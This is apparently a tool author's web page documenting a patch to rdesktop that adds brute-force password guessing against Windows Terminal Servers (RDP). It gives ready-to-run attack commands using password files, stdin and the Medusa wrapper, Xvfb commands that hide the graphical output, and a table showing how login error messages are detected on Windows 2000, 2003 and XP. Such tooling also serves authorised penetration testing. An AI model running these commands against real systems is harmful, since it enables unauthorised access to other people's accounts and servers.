Some quick notes about "brute-forcing RDP"...
The following patch to rdesktop adds the ability to perform brute-force password guessing against Microsoft Terminal Servers. This functionality was initially based off of a patch found at cqure.net. However, significant modifications were made to allow testing against Windows 2000 and detection of error messages beyond simple pass/fail. The following is a brief summary of the included changes:
rdesktop 1.4.1 patch: rdp-brute-force-r422.diff
rdesktop 1.5 patch: rdp-brute-force-r805.diff Thanks to Anton Bolshakov for the patch
Brute-force attack using password file:
rdesktop -u administrator -p passwords.txt 192.168.0.100
Brute-force attack sending passwords via STDIN:
rdesktop -u administrator -p - 192.168.0.100
The following example shows one way to use rdesktop with the MEDUSA
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt
One possible method for hiding the graphical output from rdesktop:
% Xvfb :97 -ac -nolisten tcp &
% export DISPLAY=:97
It should be noted that this patch relies on matching data which rdesktop refers to as text. Of course, this isn't text, but what I think is some graphical representation of what the text on the screen should be. Messages for a particular error varied between OS (2K, 2K3 and XP), but seemed to be consistent across multiple installs of the same OS. Of course, your luck may vary. If anyone has a better method for detecting this stuff, please let me know. Feel free to also let me if this actually works for you.
Current test cases. Each cell contains information on two attempts; one with a
valid password and another with an invalid password.
|Interactive Logon Not Permitted||FAIL(2*)/FAIL||SUCCESS(1)/FAIL||SUCCESS(1)/FAIL|
|Expired, Must Change Password||SUCCESS(1)/FAIL||SUCCESS(1)/FAIL||SUCCESS(1)/FAIL|
|Must Change at First Logon||SUCCESS(3)/FAIL||SUCCESS(1)/FAIL||SUCCESS(1)/FAIL|
|User Currently Logged In||SUCCESS(1)/FAIL|
|Terminal Server Exceeded Max Conn.||SUCCESS/FAIL||SUCCESS(1)/FAIL|
1 - Displays corresponding error message 2 - Incorrect response, no unique text to match on 3 - Displays same error as "Expired, Must Change Password" 4 - W2K sends disabled message regardless of password. XP sends disabled only if password is correct.